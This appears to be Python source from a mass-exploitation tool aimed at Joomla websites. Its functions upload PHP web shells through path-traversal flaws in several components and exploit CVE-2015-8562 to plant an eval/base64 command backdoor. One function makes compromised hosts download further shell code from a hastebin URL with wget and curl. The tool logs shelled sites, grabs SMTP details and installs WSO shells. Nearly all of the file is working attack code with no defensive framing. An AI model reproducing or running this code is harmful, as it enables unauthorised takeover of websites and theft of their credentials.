def Exploit(site):
try:
requests.post(
'http://' + site +
'/index.php?option=com_b2jcontact&view=loader&type=uploader&'
'owner=component&bid=1&qqfile=/../../../vuln.php',
data=payloadshell,
timeout=10,
headers=Headers)
CheckSh = requests.get('http://' + site +
'/components/com_b2jcontact/vuln.php',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(CheckSh.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' +
'\n')
getSMTP.JooomlaSMTPshell(
site + '/components/com_b2jcontact/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_b2jcontact',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def exploit(url):
try:
target_url = url + '/index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
execute_backdoor(
url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend
execute_backdoor(
url,
'system(\'echo "Vuln!!<?php {}(base64_decode("{}")); ?>" > vuln.php\');'
.format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7'))
CheckShell = requests.get('http://' + url + '/vuln.php',
headers=Headers,
timeout=10)
checkIndex = requests.get('http://' + url + '/vuln.htm',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/vuln.php?cmd=id' + '\n')
getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id')
if 'Vuln!!' in str(checkIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(url + '/vuln.htm\n')
return printModule.returnYes(url, 'CVE-2015-8562',
'Joomla 3.x Rce', 'Joomla')
else:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
except:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
def Exploit(site):
try:
PostData = {'path': '../../../tmp/'}
fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')}
requests.post(
'http://' + site +
'/components/com_oziogallery/imagin/scripts_ralcr/filesystem'
'/writeToFile.php',
files=fil,
data=PostData,
headers=Headers,
timeout=10)
CheckShell = requests.get('http://' + site + '/tmp/up.php',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(CheckShell.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_oziogallery',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_oziogallery',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
def Exploit(site):
try:
PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'}
fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')}
requests.post(
'http://' + site +
'/administrator/components/com_simplephotogallery/lib/uploadFile.php',
data=PostData,
files=fil,
timeout=10,
headers=Headers)
Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id')
WSo = wsoShellUploaderModule.UploadWso(
site + '/tmp/vuln.php.xxxjpg?cmd=id')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
'Joomla')
def Exploit(site):
try:
requests.post(
'http://' + site +
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
'php-ofc-library/ofc_upload_image.php?name=vuln.php',
data=payloadshell,
headers=Headers,
timeout=10)
Exp = requests.get(
'http://' + site +
'/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/'
'tmp-upload-images/vuln.php',
headers=Headers,
timeout=10)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site +
'/administrator/components/com_civicrm/civicrm/packages/'
'OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' +
'\n')
getSMTP.JooomlaSMTPshell(
site +
'/administrator/components/com_civicrm/civicrm/packages/'
'OpenFlashChart/tmp-upload-images/vuln.php?cmd=id')
return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
def Exploit(site):
try:
requests.post('http://' + site + '/administrator/components/com_redmystic/chart/'
'ofc-library/ofc_upload_image.php?name=vuln.php',
data=payloadshell, headers=Headers, timeout=10)
Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/'
'chart/tmp-upload-images/vuln.php',
headers=Headers, timeout=10)
if 'Vuln!!' in str(Exp.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=uname -a' + '\n')
getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=id')
WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/'
'tmp-upload-images/vuln.php?cmd=id')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
def Exploit(site):
try:
requests.post(
'http://' + site +
'/index.php?option=com_b2jcontact&view=loader&type=uploader&'
'owner=component&bid=1&qqfile=/../../../neko.php',
data=payloadshell,
timeout=10,
headers=Headers)
CheckSh = requests.get('http://' + site +
'/components/com_b2jcontact/neko.php',
timeout=10,
headers=Headers)
if 'neko!!' in str(CheckSh.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/components/com_b2jcontact/neko.php?cmd=uname -a' +
'\n')
getSMTP.JooomlaSMTPshell(
site + '/components/com_b2jcontact/neko.php?cmd=id')
WSo = wsoShellUploaderModule.UploadWso(
site + '/components/com_b2jcontact/neko.php?cmd=id')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
return printModule.returnYes(site, 'N/A', 'Com_b2jcontact',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def exploit(url):
try:
target_url = url + '/index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
execute_backdoor(
url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend
execute_backdoor(
url,
'system(\'echo "Shell Access!<?php {}(base64_decode("{}")); ?>" > vuln.php\');'
.format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7'))
execute_backdoor(
url,
'system(\'echo "<?php fwrite(fopen("images/sh3.php","w+"),file_get_contents("https://hastebin.com/raw/oqikagison")); ?>" > c.php\');'
)
execute_backdoor(
url,
'system(\'wget https://hastebin.com/raw/oqikagison -O images/sh.php\');'
)
execute_backdoor(
url,
'system(\'curl -O https://hastebin.com/raw/oqikagison;mv oqikagison images/sh2.php\');'
)
CheckShell = requests.get('http://' + url + '/vuln.php',
headers=Headers,
timeout=10)
checkIndex = requests.get('http://' + url + '/vuln.htm',
headers=Headers,
timeout=10)
requests.get('http://' + url + '/cc.php',
headers=Headers,
timeout=10)
CheckShell2 = requests.get('http://' + url + '/images/up3.php',
headers=Headers,
timeout=10)
CheckShell3 = requests.get('http://' + url + '/images/up2.php',
headers=Headers,
timeout=10)
CheckShell4 = requests.get('http://' + url + '/images/up.php',
headers=Headers,
timeout=10)
if 'Shell Access!' in str(CheckShell.content):
WSo = wsoShellUploaderModule.UploadWso(url +
'/vuln.php?cmd=id')
getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/vuln.php?cmd=id' + '\n')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
elif 'Shell Access!' in str(CheckShell2.content):
WSo = wsoShellUploaderModule.UploadWso(
url + '/images/up3.php?cmd=id')
getSMTP.JooomlaSMTPshell(url + '/images/up3.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/images/up3.php?cmd=id' + '\n')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
elif 'Shell Access!' in str(CheckShell3.content):
WSo = wsoShellUploaderModule.UploadWso(
url + '/images/up2.php?cmd=id')
getSMTP.JooomlaSMTPshell(url + '/images/up2.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/images/up2.php?cmd=id' + '\n')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
elif 'Shell Access!' in str(CheckShell4.content):
WSo = wsoShellUploaderModule.UploadWso(url +
'/images/up.php?cmd=id')
getSMTP.JooomlaSMTPshell(url + '/images/up.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(url + '/images/up.php?cmd=id' + '\n')
if WSo == 'No':
pass
else:
with open('result/WSo_Shell.txt', 'a') as Wr:
Wr.write('{}\n'.format(WSo))
if 'Vuln!!' in str(checkIndex.content):
with open('result/Index_results.txt', 'a') as writer:
writer.write(url + '/vuln.htm\n')
return printModule.returnYes(url, 'CVE-2015-8562',
'Joomla 3.x Rce', 'Joomla')
else:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
except:
return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce',
'Joomla')
def Exploit(site):
try:
Checker = requests.get('http://' + site +
"/components/com_foxcontact/foxcontact.php",
timeout=10,
headers=Headers)
if 'Restricted access' in str(Checker.content):
GotCid = requests.get(
'http://' + site +
'/index.php?option=com_foxcontact&view=invalid',
timeout=10,
headers=Headers)
cids = re.findall('foxcontact&Itemid=(.*?)" >',
str(GotCid.content))
flag = 0
for cid in cids:
cid = str(cid)
URLS = [
"/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../{}"
.format(cid, cid, 'vuln.php'),
"/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}"
"?cid={}&mid={}&qqfile=/../../{}".format(
cid, cid, cid, 'vuln.php'),
"/index.php?option=com_foxcontact&view=loader&type=uploader&"
"owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../{}"
.format(cid, cid, cid, cid, 'vuln.php'),
"/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../{}"
.format(cid, cid, 'vuln.php')
]
for path in URLS:
Exp = site + path
requests.post('http://' + Exp,
data=payloadshell,
timeout=10,
headers=Headers)
SH = requests.get('http://' + site +
'/components/com_foxcontact/vuln.php',
timeout=10,
headers=Headers)
if 'Vuln!!' in str(SH.content):
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site +
'/components/com_foxcontact/vuln.php?cmd=uname -a'
+ '\n')
getSMTP.JooomlaSMTPshell(
site +
'/components/com_foxcontact/vuln.php?cmd=id')
flag = 1
break
else:
pass
if flag == 0:
return printModule.returnNo(site, 'N/A', 'Com_FoxContact',
'Joomla')
else:
return printModule.returnYes(site, 'N/A', 'Com_FoxContact',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_FoxContact',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')
